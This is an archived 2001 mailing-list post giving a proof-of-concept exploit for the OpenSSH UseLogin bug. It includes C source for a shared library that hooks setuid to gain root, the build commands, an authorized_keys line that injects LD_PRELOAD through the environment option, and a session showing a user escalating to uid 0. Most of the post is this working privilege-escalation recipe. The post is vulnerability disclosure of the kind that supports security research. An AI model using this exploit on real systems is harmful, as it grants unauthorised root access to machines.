Vulnerability Development mailing list archives
OpenSSH UseLogin proof of concept exploit
From: "[WaR]" <war () genhex org>
Date: Thu, 6 Dec 2001 00:34:34 +0000
--[ OpenSSH UseLogin bug proof of concept exploit ]-- by [WaR] <war () genhex org> / http://www.genhex.org --[ Intro ]-- I was very curious in finding out how to exploit this problem. Although I don't think anyone uses this feature, I looked into the matter anyway. Here it goes. It was tested on the following platforms: - Slackware 7.1 with OpenSSH3.0p1 - RedHat 7.1 with OpenSSH_2.9p2 - RedHat 7.2 with OpenSSH-3.0.1p1 (thx scorpio) - OpenBSD 2.9 with OpenSSH_2.9 (thx pmsac) The exploit should work as long as UseLogin does. YMMV. This is based on libroot from squidge () onyx infonexus com, published a few years ago for exploiting the telnetd LD_PRELOAD bug (and you thought it wouldn't happen again...). Kudos to pmsac () toxyn org for his help figuring out the problem with the Slackware UseLogin, testing on OpenBSD, and giving the ideia for the seteuid(0) (it originally was a system("/bin/sh");). --[ Code ]-- Create a lib.c file with the next content: ---8<--- #include <stdio.h> int setuid(int uid){ printf("setuid() called...\n"); seteuid(0); } ---8<--- Compile it into a library: gcc -c -o lib.o lib.c ld -shared -o libroot.so lib.o chmod 755 ./libroot.so Now, for the tricky (*g*) part... You must have an account on the machine, and create an entry on $HOME/.ssh/authorized_keys (or authorized_keys2) with: environment="LD_PRELOAD=<your home>/libroot.so" <your public key> When sshd receives your connection, it will export this variable into the environment *BEFORE* running login. Somewhere after this, it executes a setuid. When it does, it makes a seteuid(0). $ id uid=1000(war) gid=100(users) groups=100(users) $ ssh war@localhost Enter passphrase for key '/home/war/.ssh/id_dsa': sh-2.04# id uid=0(root) gid=100(users) groups=100(users) It also works remotely. Anyway, you _MUST_ have an account on the victim machine so you can setup the enviroment, and login. And obviously (duh) it must have UseLogin enabled. That's all. shout outs to Zav @ genhex.org, Smil3r, and everyone at phibernet.org. -- [WaR] "if you can't hack it, hit it with a hammer"
Current thread:
- OpenSSH UseLogin proof of concept exploit [WaR] (Dec 05)